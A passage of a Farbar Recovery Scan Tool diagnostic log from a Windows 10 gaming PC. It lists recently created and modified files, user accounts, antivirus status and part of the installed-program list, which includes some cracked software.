2020-04-12 05:48 - 2020-04-12 05:48 - 000108032 _____ (Microsoft Corporation) C:\Windows\system32\wwanprotdim.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000096768 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Custom.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000089912 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\volmgr.sys
2020-04-12 05:48 - 2020-04-12 05:48 - 000088352 _____ (Microsoft Corporation) C:\Windows\system32\remoteaudioendpoint.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000076288 _____ (Microsoft Corporation) C:\Windows\system32\autopilot.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000070656 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Management.EnrollmentStatusTracking.ConfigProvider.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000070656 _____ (Microsoft Corporation) C:\Windows\system32\keepaliveprovider.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000064000 _____ (Microsoft Corporation) C:\Windows\system32\tbauth.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000060416 _____ (Microsoft Corporation) C:\Windows\system32\CloudNotifications.exe
2020-04-12 05:48 - 2020-04-12 05:48 - 000059192 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\storufs.sys
2020-04-12 05:48 - 2020-04-12 05:48 - 000057856 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000057344 _____ (Microsoft Corporation) C:\Windows\system32\audioresourceregistrar.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000047208 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2020-04-12 05:48 - 2020-04-12 05:48 - 000045568 _____ (Microsoft Corporation) C:\Windows\system32\cmintegrator.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000044032 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Xaml.Resources.Common.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000039424 _____ (Microsoft Corporation) C:\Windows\system32\WpcProxyStubs.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000036864 _____ (Microsoft Corporation) C:\Windows\system32\TokenBrokerCookies.exe
2020-04-12 05:48 - 2020-04-12 05:48 - 000030720 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\KNetPwrDepBroker.sys
2020-04-12 05:48 - 2020-04-12 05:48 - 000028160 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\flpydisk.sys
2020-04-12 05:48 - 2020-04-12 05:48 - 000023552 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Custom.ps.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000022528 _____ (Microsoft Corporation) C:\Windows\system32\sbservicetrigger.dll
2020-04-12 05:48 - 2020-04-12 05:48 - 000018944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\sfloppy.sys
2020-04-11 23:41 - 2020-04-11 23:41 - 000000569 _____ C:\Users\Public\Desktop\Play Europa Universalis IV.lnk
2020-04-11 23:41 - 2020-04-11 23:41 - 000000569 _____ C:\ProgramData\Desktop\Play Europa Universalis IV.lnk
2020-04-11 14:14 - 2020-04-12 07:47 - 083886080 _____ C:\Windows\system32\config\SOFTWARE
2020-04-11 14:09 - 2020-04-11 14:14 - 000000000 ____D C:\Windows\Microsoft Antimalware
2020-04-11 07:35 - 2020-04-11 07:35 - 000000000 ____D C:\Users\Public\Documents\Steam
2020-04-11 07:35 - 2020-04-11 07:35 - 000000000 ____D C:\ProgramData\Documents\Steam
2020-04-09 19:35 - 2020-04-09 19:35 - 000000216 _____ C:\Users\r_omi\Desktop\Crusader Kings II.url
2020-04-08 02:29 - 2020-04-08 02:29 - 000000000 ____D C:\Users\r_omi\AppData\Local\Steam
2020-04-08 02:28 - 2020-04-08 02:28 - 000000705 _____ C:\Users\Public\Desktop\Steam.lnk
2020-04-08 02:28 - 2020-04-08 02:28 - 000000705 _____ C:\ProgramData\Desktop\Steam.lnk
2020-04-08 02:28 - 2020-04-08 02:28 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2020-04-07 18:40 - 2020-04-07 18:40 - 000000000 ____D C:\Users\r_omi\Documents\Egosoft
2020-04-07 17:26 - 2020-04-07 17:26 - 000000527 _____ C:\Users\r_omi\Desktop\X4 - Foundations.lnk
2020-04-07 16:52 - 2020-04-07 20:31 - 000011696 _____ C:\ProgramData\DisplaySessionContainer10.log_backup1
2020-04-07 04:20 - 2020-04-07 04:20 - 000000000 ____D C:\Users\r_omi\AppData\Roaming\SexGameDevil
2020-04-05 03:01 - 2020-04-06 03:44 - 000002034 _____ C:\Users\r_omi\Desktop\Mount & Blade II Bannerlord Launcher.lnk
2020-04-04 05:01 - 2020-04-04 05:01 - 000000650 _____ C:\Users\Public\Desktop\Logitech G HUB.lnk
2020-04-04 05:01 - 2020-04-04 05:01 - 000000650 _____ C:\ProgramData\Desktop\Logitech G HUB.lnk
2020-04-04 05:01 - 2020-04-04 05:01 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Logi
2020-04-04 05:01 - 2020-04-04 05:01 - 000000000 ____D C:\Program Files\LGHUB
2020-04-04 04:25 - 2020-04-04 14:46 - 000001649 _____ C:\Users\r_omi\Desktop\Mount & Blade II Bannerlord.lnk
2020-04-04 04:20 - 2020-04-06 03:46 - 000000000 ____D C:\Users\r_omi\Documents\Mount and Blade II Bannerlord
2020-04-04 04:20 - 2020-04-04 04:20 - 000000000 ____D C:\ProgramData\Mount and Blade II Bannerlord
2020-04-04 00:32 - 2020-04-04 00:32 - 000001012 _____ C:\Users\r_omi\Desktop\µTorrent.lnk
2020-04-04 00:32 - 2020-04-04 00:32 - 000000000 ____D C:\Program Files (x86)\uTorrent
2020-04-04 00:31 - 2020-04-12 05:30 - 000000000 ____D C:\Users\r_omi\AppData\Roaming\uTorrent
2020-04-04 00:31 - 2020-04-04 00:31 - 000000000 ____D C:\Users\r_omi\AppData\Roaming\Output
2020-04-04 00:31 - 2020-04-04 00:31 - 000000000 ____D C:\Users\r_omi\AppData\Roaming\ff2
2020-04-04 00:31 - 2020-04-04 00:31 - 000000000 ____D C:\Users\r_omi\AppData\Roaming\AMozilla
2020-04-04 00:31 - 2020-04-04 00:31 - 000000000 ____D C:\Users\r_omi\AppData\Local\AMozilla
2020-04-04 00:31 - 2020-04-04 00:31 - 000000000 _____ C:\Windows\nsreg.dat
2020-04-04 00:31 - 2018-08-14 02:15 - 000399736 _____ (BitTorrent, Inc.) C:\Users\r_omi\AppData\Roaming\2.2.1.25302_utorrent_2.2.1.25302.exe
2020-03-28 18:52 - 2020-04-02 09:57 - 000116552 _____ C:\Windows\SysWOW64\EXTERNAL_CPS.sys
2020-03-28 16:39 - 2020-03-28 16:39 - 000000709 _____ C:\Users\r_omi\Desktop\Starsector.lnk
2020-03-28 16:39 - 2020-03-28 16:39 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Starsector
2020-03-24 23:09 - 2020-03-18 16:39 - 000039824 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvhdap64.dll
2020-03-24 23:08 - 2020-03-19 06:26 - 001729232 _____ C:\Windows\system32\vulkaninfo-1-999-0-0-0.exe
2020-03-24 23:08 - 2020-03-19 06:26 - 001729232 _____ C:\Windows\system32\vulkaninfo.exe
2020-03-24 23:08 - 2020-03-19 06:26 - 001329360 _____ C:\Windows\SysWOW64\vulkaninfo-1-999-0-0-0.exe
2020-03-24 23:08 - 2020-03-19 06:26 - 001329360 _____ C:\Windows\SysWOW64\vulkaninfo.exe
2020-03-24 23:08 - 2020-03-19 06:26 - 001078992 _____ C:\Windows\system32\vulkan-1-999-0-0-0.dll
2020-03-24 23:08 - 2020-03-19 06:26 - 001078992 _____ C:\Windows\system32\vulkan-1.dll
2020-03-24 23:08 - 2020-03-19 06:26 - 000937680 _____ C:\Windows\SysWOW64\vulkan-1-999-0-0-0.dll
2020-03-24 23:08 - 2020-03-19 06:26 - 000937680 _____ C:\Windows\SysWOW64\vulkan-1.dll
2020-03-24 23:08 - 2020-03-19 06:26 - 000450464 _____ (Khronos Group) C:\Windows\system32\OpenCL.dll
2020-03-24 23:08 - 2020-03-19 06:26 - 000348048 _____ (Khronos Group) C:\Windows\SysWOW64\OpenCL.dll
2020-03-24 23:08 - 2020-03-19 06:25 - 011944864 _____ (NVIDIA Corporation) C:\Windows\system32\nvptxJitCompiler.dll
2020-03-24 23:08 - 2020-03-19 06:25 - 010285472 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvptxJitCompiler.dll
2020-03-24 23:08 - 2020-03-19 06:24 - 002073200 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll
2020-03-24 23:08 - 2020-03-19 06:24 - 001565136 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll
2020-03-24 23:08 - 2020-03-19 06:24 - 001481144 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll
2020-03-24 23:08 - 2020-03-19 06:24 - 001351776 _____ (NVIDIA Corporation) C:\Windows\system32\nvfatbinaryLoader.dll
2020-03-24 23:08 - 2020-03-19 06:24 - 001142384 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll
2020-03-24 23:08 - 2020-03-19 06:24 - 001022560 _____ (NVIDIA Corporation) C:\Windows\system32\nvml.dll
2020-03-24 23:08 - 2020-03-19 06:24 - 000817264 _____ (NVIDIA Corporation) C:\Windows\system32\nvmcumd.dll
2020-03-24 23:08 - 2020-03-19 06:24 - 000680048 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFROpenGL.dll
2020-03-24 23:08 - 2020-03-19 06:24 - 000676240 _____ C:\Windows\system32\nvofapi64.dll
2020-03-24 23:08 - 2020-03-19 06:24 - 000573024 _____ (NVIDIA Corporation) C:\Windows\system32\nvidia-smi.exe
2020-03-24 23:08 - 2020-03-19 06:24 - 000546928 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFROpenGL.dll
2020-03-24 23:08 - 2020-03-19 06:24 - 000544144 _____ C:\Windows\SysWOW64\nvofapi.dll
2020-03-24 23:08 - 2020-03-19 06:23 - 017601120 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll
2020-03-24 23:08 - 2020-03-19 06:23 - 015157664 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll
2020-03-24 23:08 - 2020-03-19 06:23 - 005856864 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll
2020-03-24 23:08 - 2020-03-19 06:23 - 005158512 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll
2020-03-24 23:08 - 2020-03-19 06:23 - 001049696 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvfatbinaryLoader.dll
2020-03-24 23:08 - 2020-03-19 06:23 - 000849848 _____ (NVIDIA Corporation) C:\Windows\system32\MCU.exe
2020-03-24 23:08 - 2020-03-19 06:23 - 000811632 _____ (NVIDIA Corporation) C:\Windows\system32\nvEncodeAPI64.dll
2020-03-24 23:08 - 2020-03-19 06:23 - 000655472 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvEncodeAPI.dll
2020-03-24 23:08 - 2020-03-19 06:23 - 000445024 _____ (NVIDIA Corporation) C:\Windows\system32\nvdebugdump.exe
2020-03-24 23:08 - 2020-03-18 16:39 - 000111058 _____ C:\Windows\system32\nvidia-smi.1.pdf
2020-03-24 23:08 - 2020-03-18 16:39 - 000077314 _____ C:\Windows\system32\nvinfo.pb
2020-03-23 16:41 - 2020-03-23 16:41 - 000000000 ____D C:\Users\r_omi\AppData\Local\Paradox Interactive
2020-03-23 16:33 - 2020-03-23 16:33 - 000000770 _____ C:\Users\r_omi\Desktop\Stellaris.lnk
2020-03-23 16:33 - 2020-03-23 16:33 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Stellaris [GOG.com]
2020-03-14 15:51 - 2020-03-14 15:52 - 000000000 ____D C:\Users\r_omi\Documents\Call of Duty Modern Warfare
2020-03-14 15:48 - 2020-03-14 15:48 - 000000768 _____ C:\Users\r_omi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Telegram.lnk
2020-03-14 15:45 - 2020-03-14 15:45 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Call of Duty Modern Warfare
2020-03-14 15:10 - 2020-03-14 15:10 - 000000000 ____D C:\ProgramData\Blizzard Entertainment
2020-03-14 15:07 - 2020-04-09 22:01 - 000000000 ____D C:\Users\r_omi\AppData\Local\Battle.net
2020-03-14 15:07 - 2020-03-14 15:10 - 000000000 ____D C:\Users\r_omi\AppData\Roaming\Battle.net
2020-03-14 15:07 - 2020-03-14 15:07 - 000000585 _____ C:\Users\r_omi\Desktop\Battle.net.lnk
2020-03-14 15:07 - 2020-03-14 15:07 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net
2020-03-14 15:06 - 2020-03-14 15:07 - 000000000 ____D C:\Users\r_omi\AppData\Local\Blizzard Entertainment
2020-03-14 15:06 - 2020-03-14 15:06 - 000000000 ____D C:\ProgramData\Battle.net
2020-03-13 21:31 - 2020-03-13 21:31 - 000772096 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2020-03-13 21:31 - 2020-03-13 21:31 - 000561464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2020-03-13 18:44 - 2020-03-13 18:45 - 000000000 ____D C:\Users\r_omi\AppData\Roaming\SmartSteamEmu
==================== One month (modified) ==================
(If an entry is included in the fixlist, the file/folder will be moved.)
2020-04-12 07:53 - 2019-12-03 22:02 - 000841376 _____ C:\Windows\system32\PerfStringBackup.INI
2020-04-12 07:53 - 2019-03-19 11:50 - 000000000 ____D C:\Windows\INF
2020-04-12 07:49 - 2019-12-03 22:35 - 000000000 ____D C:\ProgramData\NVIDIA
2020-04-12 07:47 - 2019-12-04 13:57 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2020-04-12 07:47 - 2019-12-03 23:00 - 000000000 ____D C:\Users\r_omi\AppData\Roaming\LGHUB
2020-04-12 07:47 - 2019-12-03 23:00 - 000000000 ____D C:\Users\r_omi\AppData\Local\LGHUB
2020-04-12 07:47 - 2019-12-03 22:01 - 000017600 _____ C:\ProgramData\NVDisplayContainerWatchdog.log_backup1
2020-04-12 07:47 - 2019-12-03 22:01 - 000017163 _____ C:\ProgramData\NVDisplay.ContainerLocalSystem.log_backup1
2020-04-12 07:47 - 2019-03-19 11:52 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2020-04-12 07:47 - 2019-03-19 11:37 - 000524288 _____ C:\Windows\system32\config\BBI
2020-04-12 07:46 - 2019-12-04 01:06 - 000003142 _____ C:\Windows\system32\Tasks\MSIAfterburner
2020-04-12 07:46 - 2019-12-03 22:35 - 000001209 _____ C:\ProgramData\NvcDispCorePlugin.log_backup1
2020-04-12 07:46 - 2019-12-03 22:01 - 000011370 _____ C:\ProgramData\DisplaySessionContainer1.log_backup1
2020-04-12 07:19 - 2019-12-04 13:57 - 000000000 ____D C:\Windows\system32\SleepStudy
2020-04-12 07:19 - 2019-12-03 22:02 - 000000000 ____D C:\Users\r_omi
2020-04-12 07:01 - 2019-12-03 23:40 - 000000000 ____D C:\Users\r_omi\AppData\Local\D3DSCache
2020-04-12 06:45 - 2019-12-03 22:13 - 000000000 ____D C:\Users\r_omi\AppData\LocalLow\Mozilla
2020-04-12 06:43 - 2019-12-04 01:03 - 000000000 ____D C:\Program Files (x86)\MSI Afterburner
2020-04-12 05:58 - 2019-12-04 13:57 - 000505376 _____ C:\Windows\system32\FNTCACHE.DAT
2020-04-12 05:58 - 2019-03-19 13:23 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2020-04-12 05:58 - 2019-03-19 11:52 - 000000000 ____D C:\Windows\SystemResources
2020-04-12 05:58 - 2019-03-19 11:52 - 000000000 ____D C:\Windows\system32\PerceptionSimulation
2020-04-12 05:58 - 2019-03-19 11:52 - 000000000 ____D C:\Windows\ShellExperiences
2020-04-12 05:58 - 2019-03-19 11:52 - 000000000 ____D C:\Windows\Provisioning
2020-04-12 05:58 - 2019-03-19 11:52 - 000000000 ____D C:\Windows\PolicyDefinitions
2020-04-12 05:58 - 2019-03-19 11:52 - 000000000 ____D C:\Windows\bcastdvr
2020-04-12 05:54 - 2019-03-19 11:37 - 000000000 ____D C:\Windows\CbsTemp
2020-04-11 23:43 - 2020-02-23 22:32 - 000000000 ____D C:\Users\r_omi\Documents\Paradox Interactive
2020-04-11 23:43 - 2020-02-16 07:23 - 000000000 ____D C:\Users\r_omi\AppData\Roaming\GameSparks
2020-04-11 07:11 - 2019-03-19 11:52 - 000000000 ___HD C:\Program Files\WindowsApps
2020-04-11 07:11 - 2019-03-19 11:52 - 000000000 ____D C:\Windows\AppReadiness
2020-04-11 05:23 - 2019-12-03 22:04 - 000011099 _____ C:\ProgramData\DisplaySessionContainer2.log_backup1
2020-04-09 20:46 - 2019-12-05 19:05 - 000000000 ____D C:\Users\r_omi\AppData\Local\CrashDumps
2020-04-09 20:23 - 2019-12-04 00:01 - 000000000 ____D C:\Users\r_omi\AppData\Roaming\DMCache
2020-04-09 19:22 - 2020-02-14 21:05 - 000000000 ____D C:\Users\r_omi\AppData\Local\BattlEye
2020-04-09 18:24 - 2019-12-04 13:16 - 000013969 _____ C:\ProgramData\DisplaySessionContainer3.log_backup1
2020-04-09 18:21 - 2019-12-03 22:05 - 000003376 _____ C:\Windows\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-173970672-666801694-2624729176-1001
2020-04-09 18:21 - 2019-12-03 22:05 - 000000000 ___RD C:\Users\r_omi\OneDrive
2020-04-09 18:21 - 2019-12-03 22:02 - 000002363 _____ C:\Users\r_omi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2020-04-08 02:16 - 2019-12-23 15:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Garena
2020-04-08 02:16 - 2019-12-23 15:17 - 000000000 ____D C:\Program Files (x86)\Garena
2020-04-08 02:16 - 2019-12-04 23:35 - 000000000 ____D C:\ProgramData\Garena
2020-04-08 00:59 - 2019-12-03 22:13 - 000002498 _____ C:\Users\r_omi\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2020-04-07 18:03 - 2019-12-04 01:04 - 000000000 ____D C:\Windows\SysWOW64\directx
2020-04-07 06:59 - 2020-02-08 14:05 - 000000000 ____D C:\Users\r_omi\AppData\Roaming\Discord
2020-04-07 06:59 - 2019-12-24 03:26 - 000013562 _____ C:\ProgramData\DisplaySessionContainer8.log_backup1
2020-04-07 05:27 - 2019-12-25 01:15 - 000000638 _____ C:\Users\r_omi\Documents\ClownfishVoiceChanger.ini
2020-04-07 05:27 - 2019-12-04 21:31 - 000000000 ____D C:\Users\r_omi\AppData\Roaming\audacity
2020-04-05 12:12 - 2019-12-23 03:50 - 000013441 _____ C:\ProgramData\DisplaySessionContainer7.log_backup1
2020-04-04 11:53 - 2019-12-21 06:08 - 000011769 _____ C:\ProgramData\DisplaySessionContainer6.log_backup1
2020-04-03 14:23 - 2019-12-17 18:03 - 000012880 _____ C:\ProgramData\DisplaySessionContainer4.log_backup1
2020-04-02 16:48 - 2019-12-03 23:14 - 000744808 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2020-03-28 16:40 - 2019-12-03 22:35 - 000000000 ____D C:\Users\r_omi\AppData\Local\NVIDIA
2020-03-28 15:51 - 2019-12-04 23:35 - 000000000 ____D C:\ProgramData\boost_interprocess
2020-03-28 15:34 - 2019-12-04 01:03 - 000002059 _____ C:\Users\r_omi\Desktop\MSI Afterburner.lnk
2020-03-28 15:29 - 2019-12-03 23:40 - 000000000 ____D C:\Program Files (x86)\Rockstar Games
2020-03-28 15:29 - 2019-12-03 23:39 - 000000000 ____D C:\Program Files\Rockstar Games
2020-03-27 04:54 - 2020-02-21 18:57 - 000000672 _____ C:\Users\r_omi\Documents\Note2.txt
2020-03-27 04:35 - 2019-12-25 20:53 - 000000099 _____ C:\Users\r_omi\Documents\Note.txt
2020-03-25 11:31 - 2019-12-04 13:57 - 000000000 ____D C:\Windows\system32\Drivers\wd
2020-03-22 20:40 - 2019-12-20 02:28 - 000011099 _____ C:\ProgramData\DisplaySessionContainer5.log_backup1
2020-03-21 02:53 - 2019-12-03 22:12 - 000003676 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-173970672-666801694-2624729176-1001UA
2020-03-21 02:53 - 2019-12-03 22:12 - 000003408 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskUserS-1-5-21-173970672-666801694-2624729176-1001Core
2020-03-19 22:25 - 2020-02-27 18:08 - 000001184 _____ C:\Windows\system32\Drivers\etc\hosts.rollback
2020-03-19 09:22 - 2019-12-03 22:31 - 004927048 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll
2020-03-19 09:22 - 2019-12-03 22:31 - 004196160 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvapi.dll
2020-03-18 16:39 - 2019-12-03 22:01 - 000222112 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvhda64v.sys
==================== Files in the root of some directories ========
2020-04-04 00:31 - 2018-08-14 02:15 - 000399736 _____ (BitTorrent, Inc.) C:\Users\r_omi\AppData\Roaming\2.2.1.25302_utorrent_2.2.1.25302.exe
2020-02-22 16:17 - 2020-02-22 16:17 - 000000103 _____ () C:\Users\r_omi\AppData\Roaming\_encryptiondb.grf
2020-01-17 21:28 - 2020-01-17 21:54 - 000001456 _____ () C:\Users\r_omi\AppData\Local\Adobe Save for Web 13.0 Prefs
2020-04-12 07:29 - 2020-04-12 07:29 - 000007604 _____ () C:\Users\r_omi\AppData\Local\Resmon.ResmonCfg
==================== SigCheck ============================
(There is no automatic fix for files that do not pass verification.)
==================== End of FRST.txt ========================
Addition LOG
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 11-04-2020
Ran by r_omi (12-04-2020 07:57:53)
Running from D:\Downloads
Windows 10 Pro Version 1909 18363.752 (X64) (2019-12-03 14:57:24)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-173970672-666801694-2624729176-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-173970672-666801694-2624729176-503 - Limited - Disabled)
Guest (S-1-5-21-173970672-666801694-2624729176-501 - Limited - Disabled)
r_omi (S-1-5-21-173970672-666801694-2624729176-1001 - Administrator - Enabled) => C:\Users\r_omi
WDAGUtilityAccount (S-1-5-21-173970672-666801694-2624729176-504 - Limited - Disabled)
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
µTorrent (HKLM-x32\...\uTorrent) (Version: 2.2.1 - )
2.1.2.3 (HKLM-x32\...\Setup_is1) (Version:  - )
7-Zip 19.00 (x64) (HKLM\...\7-Zip) (Version: 19.00 - Igor Pavlov)
AMD Ryzen Master (HKLM\...\AMD Ryzen Master) (Version: 2.1.0.1424 - Advanced Micro Devices, Inc.)
AMD_Chipset_Drivers (HKLM-x32\...\{81322601-C53F-4D9B-A432-F773DFFE9E43}) (Version: 1.11.22.454 - Advanced Micro Devices, Inc.) Hidden
AMD_Chipset_Drivers (HKLM-x32\...\AMD_Chipset_IODrivers) (Version: 1.11.22.454 - Advanced Micro Devices, Inc.)
Battle Brothers - Beasts & Exploration (HKLM-x32\...\1262476412_is1) (Version: 1.3.0.25 - GOG.com)
Battle Brothers - Support the Developers & Kraken Banner (HKLM-x32\...\1478596696_is1) (Version: 1.3.0.25 - GOG.com)
Battle Brothers - Support the Developers & Nordic Banner (HKLM-x32\...\1439127300_is1) (Version: 1.3.0.25 - GOG.com)
Battle Brothers - Supporter Edition Upgrade (HKLM-x32\...\1353924604_is1) (Version: 1.3.0.25 - GOG.com)
Battle Brothers - Warriors of the North (HKLM-x32\...\2092450271_is1) (Version: 1.3.0.25 - GOG.com)
Battle Brothers (HKLM-x32\...\1590012242_is1) (Version: 1.3.0.25 - GOG.com)
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
Call of Duty Modern Warfare (HKLM-x32\...\Call of Duty Modern Warfare) (Version:  - Blizzard Entertainment)
Chrome Remote Desktop Host (HKLM-x32\...\{738276A2-92E7-4313-9E4D-D090F7DA98EC}) (Version: 79.0.3945.10 - Google Inc.)
Clownfish Voice Changer (HKLM\...\ClownfishVoiceChanger) (Version:  - )
Discord (HKU\S-1-5-21-173970672-666801694-2624729176-1001\...\Discord) (Version: 0.0.306 - Discord Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{66C5838F-B854-4A55-89E6-A6138747A4DF}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Europa Universalis IV Golden Century (HKLM-x32\...\Europa Universalis IV Golden Century_is1) (Version: 0.0.0 - DODI-Repacks)
FiiO Portable High-Res Music Player series v4.13.0 (HKLM-x32\...\Software_FiiO_fiio_usbaudio_Setup) (Version: 4.13.0 - FiiO)
FM Genie Scout 19g FREE version 1.2.1 19.3.6 (HKLM\...\FM Genie Scout 19g FREE_is1) (Version: 1.2.1 19.3.6 - )
Football Manager 2019 (HKLM-x32\...\Football Manager 2019_is1) (Version:  - )
Forza Horizon 4 (HKLM-x32\...\Forza Horizon 4_is1) (Version:  - )
Google Chrome (HKU\S-1-5-21-173970672-666801694-2624729176-1001\...\Google Chrome) (Version: 80.0.3987.163 - Google LLC)
IDM Crack 6.35 build 11 (HKLM-x32\...\IDM Crack 6.35 build 11) (Version: 6.35 build 11 - Crackingpatching.com Team)
Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version:  - Tonec Inc.)
Java 8 Update 241 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180241F0}) (Version: 8.0.2410.7 - Oracle Corporation)
Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
LibreOffice 6.4.0.3 (HKLM\...\{5DE38E8F-2A6F-44E7-9D24-0C6D056597D6}) (Version: 6.4.0.3 - The Document Foundation)
Logitech G HUB (HKLM\...\{521c89be-637f-4274-a840-baaf7460c2b2}) (Version:  - Logitech)
Logitech Gaming Software 5.10 (HKLM\...\{1444D2EE-C7AD-44A8-844F-2634B49353D1}) (Version: 5.10.127 - Logitech)
Microsoft OneDrive (HKU\S-1-5-21-173970672-666801694-2624729176-1001\...\OneDriveSetup.exe) (Version: 19.232.1124.0012 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 SP2 ENU (HKLM-x32\...\{3A9FC03D-C685-4831-94CF-4EDFD3749497}) (Version: 3.5.8080.0 - Microsoft Corporation)
Microsoft SQL Server Compact 3.5 SP2 x64 ENU (HKLM\...\{D4AD39AD-091E-4D33-BB2B-59F6FCB8ADC3}) (Version: 3.5.8080.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.24.28127 (HKLM-x32\...\{282975d8-55fe-4991-bbbb-06a72581ce58}) (Version: 14.24.28127.4 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.24.28127 (HKLM-x32\...\{e31cb1a4-76b5-46a5-a084-3fa419e82201}) (Version: 14.24.28127.4 - Microsoft Corporation)
Mozilla Firefox 73.0.1 (x64 en-US) (HKLM\...\Mozilla Firefox 73.0.1 (x64 en-US)) (Version: 73.0.1 - Mozilla)
